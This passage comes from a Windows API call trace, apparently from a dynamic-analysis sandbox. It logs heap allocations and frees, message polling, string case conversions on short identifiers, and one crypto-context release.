wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.809] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.809] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0266.809] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.810] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0266.810] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.810] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.810] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.810] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.811] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.811] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.811] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.811] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.811] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.811] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.812] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.812] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.812] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.812] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.812] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0266.813] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0266.813] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.813] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0266.813] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.813] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.814] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.817] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.817] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0266.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.818] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0266.818] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0266.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.819] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0266.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.820] FreeLibrary (hLibModule=0x74d40000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.820] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.820] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.821] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.822] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0266.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0266.823] RtlAllocateHeap 